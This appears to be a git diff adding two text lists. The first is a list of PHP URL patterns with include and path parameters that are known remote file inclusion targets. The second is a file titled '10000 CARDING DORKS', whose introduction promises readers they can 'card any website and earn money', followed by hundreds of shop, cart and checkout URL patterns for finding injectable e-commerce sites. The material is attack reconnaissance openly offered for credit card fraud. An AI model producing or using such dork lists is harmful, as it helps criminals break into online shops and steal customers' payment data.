+gery.php?y=
+standard.php?lang=
+gery.php?page=
+index.php?action=
+press.php?pname=
+down*.php?v=
+index3.php?second=
+show.php?recipe=
+main.php?pre=
+file.php?numero=
+print.php?str=
+standard.php?link=
+nota.php?OpenPage=
+view.php?pollname=
+print.php?l=
+index.php?go=
+standard.php?numero=
+view.php?pr=
+down*.php?read=
+down*.php?action=
+index1.php?OpenPage=
+principal.php?left=
+mod*.php?start=
+file.php?bOdy=
+gery.php?pg=
+blank.php?qry=
+base.php?eval=
+default.php?left=
+gery.php?param=
+blank.php?pa=
+nota.php?b=
+path.php?loader=
+start.php?o=
+include.php?include=
+nota.php?corpo=
+enter.php?second=
+sub*.php?pname=
+mod*.php?pageweb=
+principal.php?addr=
+standard.php?action=
+template.php?lang=
+include.php?basepath=
+sub*.php?ir=
+down*.php?nivel=
+path.php?opcion=
+print.php?category=
+print.php?menu=
+layout.php?secao=
+template.php?param=
+standard.php?ref=
+base.php?include=
+blank.php?bOdy=
+path.php?pref=
+print.php?g=
+padrao.php?subject=
+nota.php?modo=
+index3.php?loader=
+template.php?seite=
+general.php?pageweb=
+index2.php?param=
+path.php?nivel=
+page.php?pref=
+press.php?pref=
+enter.php?ev=
+standard.php?middle=
+index2.php?recipe=
+blank.php?dir=
+home.php?pageweb=
+view.php?panel=
+down*.php?home=
+head.php?ir=
+mod*.php?ir=
+show.php?pagina=
+default.php?base_dir=
+show.php?loader=
+path.php?mid=
+blank.php?abre=
+down*.php?choix=
+info.php?opcion=
+page.php?loader=
+principal.php?oldal=
+index1.php?load=
+home.php?content=
+pagina.php?sekce=
+file.php?n=
+include.php?redirect=
+print.php?itemnav=
+enter.php?index=
+print.php?middle=
+sitio.php?goFile=
+head.php?include=
+enter.php?e=
+index.php?play=
+enter.php?id=
+view.php?mod=
+show.php?nivel=
+file.php?channel=
+layout.php?choix=
+info.php?bOdy=
+include.php?go=
+index3.php?nivel=
+sub*.php?include=
+path.php?numero=
+principal.php?header=
+main.php?opcion=
+enter.php?s=
+sub*.php?pre=
+include.php?index=
+gery.php?pageweb=
+padrao.php?path=
+info.php?url=
+press.php?ev=
+index1.php?pg=
+print.php?in=
+general.php?modo=
+head.php?ki=
+press.php?my=
+index1.php?pollname=
+principal.php?to=
+default.php?play=
+page.php?g=
+nota.php?pg=
+blank.php?destino=
+blank.php?z=
+components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
+module_db.php?pivot_path= module_db.php?pivot_path=
+/classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir=
+components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=
+com_extended_registration
+smarty_config.php?root_dir= smarty
+include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr
+send_reminders.php?includedir= send_reminders.php?includedir=
+components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= com_rsgery
+inc/functions.inc.php?config[ppa_root_path]= Index Albums index.php
+/components/com_cpg/cpg.php?mosConfig_absolute_path= com_cpg
+[Script Path]/admin/index.php?o= admin/index.php;
+/admin/index.php?o= admin/index.php;
+/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
+/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar
+admin/doeditconfig.php?thispath=../includes&config[path]= admin
+/components/com_simpleboard/image_upload.php?sbp= com_simpleboard
+components/com_simpleboard/image_upload.php?sbp= com_simpleboard
+/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
+mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
+zentrack/index.php?configFile=
+inst/index.php?lng=../../include/main.inc&G_PATH=
+pivot/modules/module_db.php?pivot_path=
+include/write.php?dir=
+includes/header.php?systempath=
+becommunity/community/index.php?pageurl=
+agendax/addevent.inc.php?agendax_path=
+myPHPCalendar/admin.php?cal_dir=
+yabbse/Sources/Packages.php?sourcedir=
+zboard/zboard.php
+path_of_cpcommerce/_functions.php?prefixpage.php?pa=
+default.php?menue=
+main.php?goto=
+index1.php?abre=
+info.php?seccion=
+index2.php?pa=
+layout.php?pageweb=
+nota.php?disp=
+index1.php?bOdy=
+default.php?nivel=
+show.php?header=
+down*.php?pag=
+start.php?tipo=
+standard.php?w=
+index.php?open=
+blank.php?menu=
+general.php?nivel=
+padrao.php?nivel=
+*inc*.php?addr=
+index.php?var=
+home.php?redirect=
+*inc*.php?link=
+*inc*.php?incl=
+padrao.php?corpo=
+down*.php?url=
+enter.php?goto=
+down*.php?addr=
+sub*.php?j=
+principal.php?f=
+sub*.php?menue=
+index2.php?section=
+general.php?my=
+head.php?loader=
+general.php?goto=
+include.php?dir=
+start.php?header=
+blank.php?in=
+base.php?name=
+nota.php?goFile=
+head.php?base_dir=
+mod*.php?recipe=
+press.php?pr=
+padrao.php?*[*]*=
+layout.php?opcion=
+print.php?rub=
+index.php?pr=
+general.php?seite=
+pagina.php?numero=
+*inc*.php?pg=
+nota.php?rub=
+view.php?seite=
+pagina.php?recipe=
+index.php?pref=
+page.php?action=
+page.php?ev=
+show.php?ir=
+head.php?index=
+mod*.php?pname=
+view.php?ir=
+*inc*.php?start=
+principal.php?rub=
+principal.php?corpo=
+padrao.php?middle=
+base.php?pname=
+template.php?header=
+view.php?sp=
+main.php?name=
+nota.php?m=
+blank.php?open=
+head.php?dir=
+page.php?pname=
+*inc*.php?k=
+index.php?pollname=
+head.php?oldal=
+index1.php?str=
+template.php?choix=
+down*.php?pollname=
+page.php?recipe=
+template.php?corpo=
+nota.php?sec=
+info.php?*[*]*=
+sub*.php?*[*]*=
+page.php?q=
+index1.php?type=
+gery.php?y=
+standard.php?lang=
+gery.php?page=
+index.php?action=
+press.php?pname=
+down*.php?v=
+index3.php?second=
+show.php?recipe=
+main.php?pre=
+file.php?numero=
+print.php?str=
+standard.php?link=
+nota.php?OpenPage=
+view.php?pollname=
+print.php?l=
+index.php?go=
+standard.php?numero=
+view.php?pr=
+down*.php?read=
+down*.php?action=
+index1.php?OpenPage=
+principal.php?left=
+mod*.php?start=
+file.php?bOdy=
+gery.php?pg=
+blank.php?qry=
+base.php?eval=
+default.php?left=
+gery.php?param=
+blank.php?pa=
+nota.php?b=
+path.php?loader=
+start.php?o=
+include.php?include=
+nota.php?corpo=
+enter.php?second=
+sub*.php?pname=
+mod*.php?pageweb=
+principal.php?addr=
+standard.php?action=
+template.php?lang=
+include.php?basepath=
+sub*.php?ir=
+down*.php?nivel=
+path.php?opcion=
+print.php?category=
+print.php?menu=
+layout.php?secao=
+template.php?param=
+standard.php?ref=
+base.php?include=
+blank.php?bOdy=
+path.php?pref=
+print.php?g=
+padrao.php?subject=
+nota.php?modo=
+index3.php?loader=
+template.php?seite=
+general.php?pageweb=
+index2.php?param=
+path.php?nivel=
+page.php?pref=
+press.php?pref=
+enter.php?ev=
+standard.php?middle=
+index2.php?recipe=
+blank.php?dir=
+home.php?pageweb=
+view.php?panel=
+down*.php?home=
+head.php?ir=
+mod*.php?ir=
+show.php?pagina=
+default.php?base_dir=
+show.php?loader=
+path.php?mid=
+blank.php?abre=
+down*.php?choix=
+info.php?opcion=
+page.php?loader=
+principal.php?oldal=
+index1.php?load=
+home.php?content=
+pagina.php?sekce=
+file.php?n=
+include.php?redirect=
+print.php?itemnav=
+enter.php?index=
+print.php?middle=
+sitio.php?goFile=
+head.php?include=
+enter.php?e=
+index.php?play=
+enter.php?id=
+view.php?mod=
+show.php?nivel=
+file.php?channel=
+layout.php?choix=
+info.php?bOdy=
+include.php?go=
+index3.php?nivel=
+sub*.php?include=
+path.php?numero=
+principal.php?header=
+main.php?opcion=
+enter.php?s=
+sub*.php?pre=
+include.php?index=
+gery.php?pageweb=
+padrao.php?path=
+info.php?url=
+press.php?ev=
+index1.php?pg=
+print.php?in=
+general.php?modo=
+head.php?ki=
+press.php?my=
+index1.php?pollname=
+principal.php?to=
+default.php?play=
+page.php?g=
+nota.php?pg=
+blank.php?destino=
+blank.php?z=
+components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
+module_db.php?pivot_path= module_db.php?pivot_path=
+/classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir=
+components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=
+com_extended_registration
+smarty_config.php?root_dir= smarty
+include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr
+send_reminders.php?includedir= send_reminders.php?includedir=
+components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= com_rsgery
+inc/functions.inc.php?config[ppa_root_path]= Index Albums index.php
+/components/com_cpg/cpg.php?mosConfig_absolute_path= com_cpg
+[Script Path]/admin/index.php?o= admin/index.php;
+/admin/index.php?o= admin/index.php;
+/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
+/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar
+admin/doeditconfig.php?thispath=../includes&config[path]= admin
+/components/com_simpleboard/image_upload.php?sbp= com_simpleboard
+components/com_simpleboard/image_upload.php?sbp= com_simpleboard
+/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
+mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
+zentrack/index.php?configFile=
+inst/index.php?lng=../../include/main.inc&G_PATH=
+pivot/modules/module_db.php?pivot_path=
+include/write.php?dir=
+includes/header.php?systempath=
+becommunity/community/index.php?pageurl=
+agendax/addevent.inc.php?agendax_path=
+myPHPCalendar/admin.php?cal_dir=
+yabbse/Sources/Packages.php?sourcedir=
+zboard/zboard.php
+path_of_cpcommerce/_functions.php?prefix
diff --git a/10000 CARDING DORKS_txt.md b/10000 CARDING DORKS_txt.md
new file mode 100644
index 0000000..c066aed
--- /dev/null
+++ b/10000 CARDING DORKS_txt.md
@@ -0,0 +1,5727 @@
+# 10000 CARDING DORKS
+
+
+---
+
+Wednesday, February 1, 2017
+
+Hello today i am giving you latest carding dorks 2017 and 2018.By These you can Card any website and earn money.
+
+Carding is a term describing the trafficking of credit card, bank account and other personal information online as well as related fraud services.Carding activities also encompass procurement of details, and money laundering techniques. Modern carding sites have been described as full-service commercial entities.
+
+What Is Dorks?
+
+A Google dork is an employee who unknowingly exposes sensitive corporate information on the Internet. The word dork is slang for a slow-witted or in-ept person.
+
+Google dorks put corporate information at risk because they unwittingly create back doors that allow an attacker to enter a network without permission and/or gain access to unauthorized
+
+10000+ Latest Carding Dorks 2017 and 2018
+
+accinfo.php?cartId=
+acclogin.php?cartID=
+add.php?bookid=
+add_cart.php?num=
+addcart.php?
+addItem.php
+add-to-cart.php?ID=
+addToCart.php?idProduct=
+addtomylist.php?ProdId=
+adminEditProductFields.php?intProdID=
+advSearch_h.php?idCategory=
+affiliate.php?ID=
+affiliate-agreement.cfm?storeid=
+affiliates.php?id=
+ancillary.php?ID=
+
+archive.php?id=
+article.php?id=
+phpx?PageID
+basket.php?id=
+Book.php?bookID=
+book_list.php?bookid=
+book_view.php?bookid=
+BookDetails.php?ID=
+browse.php?catid=
+browse_item_details.php
+Browse_Item_Details.php?Store_Id=
+buy.php?
+buy.php?bookid=
+bycategory.php?id=
+cardinfo.php?card=
+cart.php?action=
+cart.php?cart_id=
+cart.php?id=
+cart_additem.php?id=
+cart_validate.php?id=
+cartadd.php?id=
+cat.php?iCat=
+catalog.php
+catalog.php?CatalogID=
+catalog_item.php?ID=
+catalog_main.php?catid=
+category.php
+category.php?catid=
+
+category_list.php?id=
+categorydisplay.php?catid=
+checkout.php?cartid=
+checkout.php?UserID=
+checkout_confirmed.php?order_id=
+checkout1.php?cartid=
+comersus_listCategoriesAndProducts.php?idCategory=
+comersus_optEmailToFriendForm.php?idProduct=
+comersus_optReviewReadExec.php?idProduct=
+comersus_viewItem.php?idProduct=
+comments_form.php?ID=
+contact.php?cartId=
+content.php?id=
+customerService.php?****ID1=
+default.php?catID=
+description.php?bookid=
+details.php?BookID=
+details.php?Press_Release_ID=
+details.php?Product_ID=
+details.php?Service_ID=
+display_item.php?id=
+displayproducts.php
+downloadTrial.php?intProdID=
+emailproduct.php?itemid=
+emailToFriend.php?idProduct=
+events.php?ID=
+faq.php?cartID=
+
+faq_list.php?id=
+faqs.php?id=
+feedback.php?title=
+freedownload.php?bookid=
+fullDisplay.php?item=
+getbook.php?bookid=
+GetItems.php?itemid=
+giftDetail.php?id=
+help.php?CartId=
+home.php?id=
+index.php?cart=
+index.php?cartID=
+index.php?ID=
+info.php?ID=
+item.php?eid=
+item.php?item_id=
+item.php?itemid=
+item.php?model=
+item.php?prodtype=
+item.php?shopcd=
+item_details.php?catid=
+item_list.php?maingroup
+
+item_show.php?code_no=
+itemDesc.php?CartId=
+itemdetail.php?item=
+itemdetails.php?catalogid=
+learnmore.php?cartID=
+links.php?catid=
+list.php?bookid=
+List.php?CatID=
+listcategoriesandproducts.php?idCategory=
+modline.php?id=
+myaccount.php?catid=
+news.php?id=
+order.php?BookID=
+order.php?id=
+order.php?item_ID=
+OrderForm.php?Cart=
+page.php?PartID=
+payment.php?CartID=
+pdetail.php?item_id=
+powersearch.php?CartId=
+price.php
+privacy.php?cartID=
+prodbycat.php?intCatalogID=
+prodetails.php?prodid=
+prodlist.php?catid=
+product.php?bookID=
+product.php?intProdID=
+product_info.php?item_id=
+productDetails.php?idProduct=
+productDisplay.php
+productinfo.php?item=
+productlist.php?ViewType=Category&CategoryID=
+productpage.php
+products.php?ID=
+products.php?keyword=
+products_category.php?CategoryID=
+products_detail.php?CategoryID=
+productsByCategory.php?intCatalogID=
+prodView.php?idProduct=
+promo.php?id=
+promotion.php?catid=
+pview.php?Item=
+resellers.php?idCategory=
+results.php?cat=
+savecart.php?CartId=
+search.php?CartID=
+searchcat.php?search_id=
+Select_Item.php?id=
+Services.php?ID=
+shippinginfo.php?CartId=
+shop.php?a=
+
+shop.php?action=
+shop.php?bookid=
+shop.php?cartID=
+shop_details.php?prodid=
+shopaddtocart.php
+shopaddtocart.php?catalogid=
+shopbasket.php?bookid=
+shopbycategory.php?catid=
+shopcart.php?title=
+shopcreatorder.php
+shopcurrency.php?cid=
+shopdc.php?bookid=
+shopdisplaycategories.php
+shopdisplayproduct.php?catalogid=
+shopdisplayproducts.php
+shopexd.php
+shopexd.php?catalogid=
+shopping_basket.php?cartID=
+shopprojectlogin.php
+shopquery.php?catalogid=
+shopremoveitem.php?cartid=
+shopreviewadd.php?id=
+shopreviewlist.php?id=
+ShopSearch.php?CategoryID=
+shoptellafriend.php?id=
+shopthanks.php
+shopwelcome.php?title=
+show_item.php?id=
+show_item_details.php?item_id=
+showbook.php?bookid=
+showStore.php?catID=
+shprodde.php?SKU=
+specials.php?id=
+store.php?id=
+store_bycat.php?id=
+store_listing.php?id=
+Store_ViewProducts.php?Cat=
+store-details.php?id=
+storefront.php?id=
+storefronts.php?title=
+storeitem.php?item=
+StoreRedirect.php?ID=
+subcategories.php?id=
+tek9.php?
+template.php?Action=Item&pid=
+topic.php?ID=
+tuangou.php?bookid=
+type.php?iType=
+updatebasket.php?bookid=
+
+updates.php?ID=
+view.php?cid=
+view_cart.php?title=
+view_detail.php?ID=
+viewcart.php?CartId=
+viewCart.php?userID=
+viewCat_h.php?idCategory=
+viewevent.php?EventID=
+viewitem.php?recor=
+viewPrd.php?idcategory=
+ViewProduct.php?misc=
+voteList.php?item_ID=
+whatsnew.php?idCategory=
+WsAncillary.php?ID=
+WsPages.php?ID=noticiasDetalle.php?xid=
+sitio/item.php?idcd=
+index.php?site=
+de/content.php?page_id=
+gallerysort.php?iid=
+products.php?type=
+event.php?id=
+showfeature.php?id=
+home.php?ID=
+tas/event.php?id=
+profile.php?id=
+details.php?id=
+past-event.php?id=
+index.php?action=
+site/products.php?prodid=
+page.php?pId=
+resources/vulnerabilities_list.php?id=
+site.php?id=
+products/index.php?rangeid=
+global_projects.php?cid=
+publications/view.php?id=
+display_page.php?id=
+pages.php?ID=
+lmsrecords_cd.php?cdid=
+product.php?prd=
+cat/?catid=
+products/product-list.php?id=
+debate-detail.php?id=
+cbmer/congres/page.php?LAN=
+content.php?id=
+news.php?ID=
+photogallery.php?id=
+index.php?id=
+product/product.php?product_no=
+nyheder.htm?show=
+book.php?ID=
+print.php?id=
+detail.php?id=
+book.php?id=
+content.php?PID=
+more_detail.php?id=
+content.php?id=
+view_items.php?id=
+view_author.php?id=
+main.php?id=
+english/fonction/print.php?id=
+magazines/adult_magazine_single_page.php?magid=
+product_details.php?prodid=
+magazines/adult_magazine_full_year.php?magid=
+products/card.php?prodID=
+catalog/product.php?cat_id=
+e_board/modifyform.html?code=
+community/calendar-event-fr.php?id=
+products.php?p=
+news.php?id=
+view/7/9628/1.html?reply=
+product_details.php?prodid=
+
+catalog/product.php?pid=
+rating.php?id=
+?page=
+catalog/main.php?cat_id=
+index.php?page=
+detail.php?prodid=
+products/product.php?pid=
+news.php?id=
+book_detail.php?BookID=
+catalog/main.php?cat_id=
+catalog/main.php?cat_id=
+default.php?cPath=
+catalog/main.php?cat_id=
+catalog/main.php?cat_id=
+category.php?catid=
+categories.php?cat=
+categories.php?cat=
+detail.php?prodID=
+detail.php?id=
+category.php?id=
+hm/inside.php?id=
+index.php?area_id=
+gallery.php?id=
+products.php?cat=
+products.php?cat=
+media/pr.php?id=
+books/book.php?proj_nr=
+products/card.php?prodID=
+general.php?id=
+news.php?t=
+usb/devices/showdev.php?id=
+content/detail.php?id=
+templet.php?acticle_id=
+news/news/title_show.php?id=
+product.php?id=
+index.php?url=
+cryolab/content.php?cid=
+ls.php?id=
+s.php?w=
+abroad/page.php?cid=
+bayer/dtnews.php?id=
+news/temp.php?id=
+index.php?url=
+book/bookcover.php?bookid=
+index.php/en/component/pvm/?view=
+product/list.php?pid=
+cats.php?cat=
+software_categories.php?cat_id=
+print.php?sid=
+docDetail.aspx?chnum=
+index.php?section=
+index.php?page=
+index.php?page=
+en/publications.php?id=
+events/detail.php?ID=
+forum/profile.php?id=
+media/pr.php?id=
+content.php?ID=
+cloudbank/detail.php?ID=
+pages.php?id=
+news.php?id=
+beitrag_D.php?id=
+content/index.php?id=
+index.php?i=
+?action=
+index.php?page=
+beitrag_F.php?id=
+index.php?pageid=
+page.php?modul=
+detail.php?id=
+index.php?w=
+index.php?modus=
+news.php?id=
+news.php?id=
+aktuelles/meldungen-detail.php?id=
+item.php?id=
+obio/detail.php?id=
+page/de/produkte/produkte.php?prodID=
+packages_display.php?ref=
+shop/index.php?cPath=
+modules.php?bookid=
+product-range.php?rangeID=
+en/news/fullnews.php?newsid=
+deal_coupon.php?cat_id=
+show.php?id=
+blog/index.php?idBlog=
+redaktion/whiteteeth/detail.php?nr=
+HistoryStore/pages/item.php?itemID=
+aktuelles/veranstaltungen/detail.php?id=
+tecdaten/showdetail.php?prodid=
+?id=
+rating/stat.php?id=
+content.php?id=
+viewapp.php?id=
+item.php?id=
+news/newsitem.php?newsID=
+FernandFaerie/index.php?c=
+show.php?id=
+?cat=
+categories.php?cat=
+category.php?c=
+product_info.php?id=
+prod.php?cat=
+store/product.php?productid=
+browsepr.php?pr=
+product-list.php?cid=
+products.php?cat_id=
+product.php?ItemID=
+category.php?c=
+main.php?id=
+article.php?id=
+showproduct.php?productId=
+view_item.php?item=
+skunkworks/content.php?id=
+index.php?id=
+item_show.php?id=
+publications.php?Id=
+
+index.php?t=
+view_items.php?id=
+portafolio/portafolio.php?id=
+YZboard/view.php?id=
+index_en.php?ref=
+index_en.php?ref=
+category.php?id_category=
+main.php?id=
+main.php?id=
+calendar/event.php?id=
+default.php?cPath=
+pages/print.php?id=
+index.php?pg_t=
+_news/news.php?id=
+forum/showProfile.php?id=
+fr/commande-liste-categorie.php?panier=
+downloads/shambler.php?id=
+sinformer/n/imprimer.php?id=
+More_Details.php?id=
+directory/contenu.php?id_cat=
+properties.php?id_cat=
+forum/showProfile.php?id=
+downloads/category.php?c=
+index.php?cat=
+product_info.php?products_id=
+product_info.php?products_id=
+product-list.php?category_id=
+detail.php?siteid=
+projects/event.php?id=
+view_items.php?id=
+more_details.php?id=
+melbourne_details.php?id=
+more_details.php?id=
+detail.php?id=
+more_details.php?id=
+home.php?cat=
+idlechat/message.php?id=
+detail.php?id=
+print.php?sid=
+more_details.php?id=
+default.php?cPath=
+events/event.php?id=
+brand.php?id=
+toynbeestudios/content.php?id=
+show-book.php?id=
+more_details.php?id=
+store/default.php?cPath=
+property.php?id=
+product_details.php?id=
+more_details.php?id=
+view-event.php?id=
+content.php?id=
+book.php?id=
+page/venue.php?id=
+print.php?sid=
+colourpointeducational/more_details.php?id=
+print.php?sid=
+browse/book.php?journalID=
+section.php?section=
+bookDetails.php?id=
+profiles/profile.php?profileid=
+event.php?id=
+gallery.php?id=
+category.php?CID=
+corporate/newsreleases_more.php?id=
+print.php?id=
+view_items.php?id=
+more_details.php?id=
+county-facts/diary/vcsgen.php?id=
+idlechat/message.php?id=
+podcast/item.php?pid=
+products.php?act=
+details.php?prodId=
+socsci/events/full_details.php?id=
+ourblog.php?categoryid=
+mall/more.php?ProdID=
+archive/get.php?message_id=
+review/review_form.php?item_id=
+english/publicproducts.php?groupid=
+news_and_notices.php?news_id=
+rounds-detail.php?id=
+gig.php?id=
+board/view.php?no=
+index.php?modus=
+news_item.php?id=
+rss.php?cat=
+products/product.php?id=
+details.php?ProdID=
+els_/product/product.php?id=
+store/description.php?iddesc=
+socsci/news_items/full_story.php?id=
+modules/forum/index.php?topic_id=
+feature.php?id=
+products/Blitzball.htm?id=
+profile_print.php?id=
+questions.php?questionid=
+html/scoutnew.php?prodid=
+main/index.php?action=
+********.php?cid=
+********.php?cid=
+news.php?type=
+index.php?page=
+viewthread.php?tid=
+summary.php?PID=
+news/latest_news.php?cat_id=
+index.php?cPath=
+category.php?CID=
+index.php?pid=
+more_details.php?id=
+specials.php?osCsid=
+search/display.php?BookID=
+articles.php?id=
+print.php?sid=
+page.php?id=
+more_details.php?id=
+newsite/pdf_show.php?id=
+shop/category.php?cat_id=
+shopcafe-shop-product.php?bookId=
+shop/books_detail.php?bookID=
+index.php?cPath=
+more_details.php?id=
+news.php?id=
+more_details.php?id=
+shop/books_detail.php?bookID=
+more_details.php?id=
+blog.php?blog=
+index.php?pid=
+prodotti.php?id_cat=
+category.php?CID=
+more_details.php?id=
+poem_list.php?bookID=
+more_details.php?id=
+content.php?categoryId=
+authorDetails.php?bookID=
+press_release.php?id=
+item_list.php?cat_id=
+colourpointeducational/more_details.php?id=
+index.php?pid=
+download.php?id=
+shop/category.php?cat_id=
+i-know/content.php?page=
+store/index.php?cat_id=
+yacht_search/yacht_view.php?pid=
+pharmaxim/category.php?cid=
+print.php?sid=
+specials.php?osCsid=
+store.php?cat_id=
+category.php?cid=
+displayrange.php?rangeid=
+product.php?id=
+csc/news-details.php?cat=
+products-display-details.php?prodid=
+stockists_list.php?area_id=
+news/newsitem.php?newsID=
+index.php?pid=
+newsitem.php?newsid=
+category.php?id=
+news/newsitem.php?newsID=
+details.php?prodId=
+publications/publication.php?id=
+purelydiamond/products/category.php?cat=
+category.php?cid=
+product/detail.php?id=
+news/newsitem.php?newsID=
+details.php?prodID=
+item.php?item_id=
+edition.php?area_id=
+page.php?area_id=
+view_newsletter.php?id=
+library.php?cat=
+categories.php?cat=
+page.php?area_id=
+categories.php?cat=
+publications.php?id=
+item.php?sub_id=
+page.php?area_id=
+page.php?area_id=
+category.php?catid=
+
+content.php?cID=
+newsitem.php?newsid=
+frontend/category.php?id_category=
+news/newsitem.php?newsID=
+things-to-do/detail.php?id=
+page.php?area_id=
+page.php?area_id=
+listing.php?cat=
+item.php?iid=
+customer/home.php?cat=
+staff/publications.php?sn=
+news/newsitem.php?newsID=
+library.php?cat=
+main/index.php?uid=
+library.php?cat=
+shop/eventshop/product_detail.php?itemid=
+news/newsitem.php?newsID=
+news/newsitem.php?newsID=
+library.php?cat=
+FullStory.php?Id=
+publications.php?ID=
+publications/book_reviews/full_review.php?id=
+newsitem.php?newsID=
+newsItem.php?newsId=
+site/en/list_service.php?cat=
+page.php?area_id=
+product.php?ProductID=
+releases_headlines_details.php?id=
+product.php?shopprodid=
+product.php?productid=
+product.php?product=
+product.php?product_id=
+productlist.php?id=
+product.php?shopprodid=
+garden_equipment/pest-weed-control/product.php?pr=
+product.php?shopprodid=
+browsepr.php?pr=
+productlist.php?id=
+kshop/product.php?productid=
+product.php?pid=
+showproduct.php?prodid=
+product.php?productid=
+productlist.php?id=
+index.php?pageId=
+productlist.php?tid=
+product-list.php?id=
+onlinesales/product.php?product_id=
+garden_equipment/Fruit-Cage/product.php?pr=
+product.php?shopprodid=
+product_info.php?products_id=
+productlist.php?tid=
+showsub.php?id=
+productlist.php?fid=
+products.php?cat=
+products.php?cat=
+product-list.php?id=
+product.php?sku=
+store/product.php?productid=
+products.php?cat=
+productList.php?cat=
+product_detail.php?product_id=
+product.php?pid=
+wiki/pmwiki.php?page****=
+summary.php?PID=
+productlist.php?grpid=
+cart/product.php?productid=
+db/CART/product_details.php?product_id=
+ProductList.php?id=
+products/product.php?id=
+product.php?shopprodid=
+product_info.php?products_id=
+product_ranges_view.php?ID=
+cei/cedb/projdetail.php?projID=
+products.php?DepartmentID=
+product.php?shopprodid=
+product.php?shopprodid=
+product_info.php?products_id=
+index.php?news=
+education/content.php?page=
+Interior/productlist.php?id=
+products.php?categoryID=
+modules.php?****=
+message/comment_threads.php?postID=
+artist_art.php?id=
+products.php?cat=
+index.php?option=
+ov_tv.php?item=
+index.php?lang=
+showproduct.php?cat=
+index.php?lang=
+product.php?bid=
+product.php?bid=
+cps/rde/xchg/tm/hs.xsl/liens_detail.html?lnkId=
+item_show.php?lid=
+?pagerequested=
+downloads.php?id=
+print.php?sid=
+print.php?sid=
+product.php?intProductID=
+productList.php?id=
+product.php?intProductID=
+more_details.php?id=
+more_details.php?id=
+books.php?id=
+index.php?offs=
+mboard/replies.php?parent_id=
+Computer Science.php?id=
+news.php?id=
+pdf_post.php?ID=
+reviews.php?id=
+art.php?id=
+prod.php?cat=
+event_info.php?p=
+view_items.php?id=
+home.php?cat=
+item_book.php?CAT=
+www/index.php?page=
+schule/termine.php?view=
+goods_detail.php?data=
+storemanager/contents/item.php?page_code=
+view_items.php?id=
+customer/board.htm?mode=
+help/com_view.html?code=
+n_replyboard.php?typeboard=
+eng_board/view.php?T****=
+prev_results.php?prodID=
+bbs/view.php?no=
+gnu/?doc=
+zb/view.php?uid=
+global/product/product.php?gubun=
+m_view.php?ps_db=
+naboard/memo.php?bd=
+bookmark/mybook/bookmark.php?bookPageNo=
+board/board.html?table=
+kboard/kboard.php?board=
+order.asp?lotid=
+english/board/view****.php?code=
+goboard/front/board_view.php?code=
+bbs/bbsView.php?id=
+boardView.php?bbs=
+eng/rgboard/view.php?&bbs_id=
+product/product.php?cate=
+content.php?p=
+page.php?module=
+?pid=
+bookpage.php?id=
+view_items.php?id=
+index.php?pagina=
+product.php?prodid=
+notify/notify_form.php?topic_id=
+php/index.php?id=
+content.php?cid=
+product.php?product_id=
+constructies/product.php?id=
+detail.php?id=
+php/index.php?id=
+index.php?section=
+product.php?****=
+show_bug.cgi?id=
+detail.php?id=
+bookpage.php?id=
+product.php?id=
+today.php?eventid=
+main.php?item=
+index.php?cPath=
+news.php?id=
+event.php?id=
+print.php?sid=
+news/news.php?id=
+module/range/dutch_windmill_collection.php?rangeId=
+print.php?sid=
+
+show_bug.cgi?id=
+product_details.php?product_id=
+products.php?groupid=
+projdetails.php?id=
+product.php?productid=
+products.php?catid=
+product.php?product_id=
+product.php?prodid=
+product.php?prodid=
+newsitem.php?newsID=
+newsitem.php?newsid=
+profile.php?id=
+********s_in_area.php?area_id=
+productlist.php?id=
+productsview.php?proid=
+rss.php?cat=
+pub/pds/pds_view.php?start=
+products.php?rub=
+ogloszenia/rss.php?cat=
+print.php?sid=
+product.php?id=
+print.php?sid=
+magazin.php?cid=
+galerie.php?cid=
+www/index.php?page=
+view.php?id=
+content.php?id=
+board/read.php?tid=
+product.php?id_h=
+news.php?id=
+index.php?book=
+products.php?act=
+reply.php?id=
+stat.php?id=
+products.php?cat_id=
+free_board/board_view.html?page=
+item.php?id=
+view_items.php?id=
+main.php?prodID=
+gb/comment.php?gb_id=
+gb/comment.php?gb_id=
+classifieds/showproduct.php?product=
+view.php?pageNum_rscomp=
+cart/addToCart.php?cid=
+content/pages/index.php?id_cat=
+content.php?id=
+display.php?ID=
+display.php?ID=
+ponuky/item_show.php?ID=
+default.php?cPath=
+main/magpreview.php?id=
+***zine/board.php?board=
+content.php?arti_id=
+mall/more.php?ProdID=
+product.php?cat=
+news.php?id=
+content/view.php?id=
+content.php?id=
+index.php?action=
+board_view.php?s_board_id=
+KM/BOARD/readboard.php?id=
+board_view.html?id=
+content.php?cont_title=
+category.php?catid=
+mall/more.php?ProdID=
+publications.php?id=
+irbeautina/product_detail.php?product_id=
+print.php?sid=
+index_en.php?id=
+bid/topic.php?TopicID=
+news_content.php?CategoryID=
+front/bin/forumview.phtml?bbcode=
+cat.php?cat_id=
+stat.php?id=
+veranstaltungen/detail.php?id=
+more_details.php?id=
+english/print.php?id=
+print.php?id=
+view_item.php?id=
+content/conference_register.php?ID=
+rss/event.php?id=
+event.php?id=
+main.php?id=
+rtfe.php?siteid=
+category.php?cid=
+classifieds/detail.php?siteid=
+tools/print.php?id=
+channel/channel-layout.php?objId=
+content.php?id=
+resources/detail.php?id=
+more_details.php?id=
+detail.php?id=
+view_items.php?id=
+content/programme.php?ID=
+book.php?id=
+php/fid985C124FBD9EF3A29BA8F40521F12D097B0E2016.aspx?s=
+detail.php?id=
+default.php?cPath=
+more_details.php?id=
+php/fid8E1BED06B1301BAE3ED64383D5F619E3B1997A70.aspx?s=
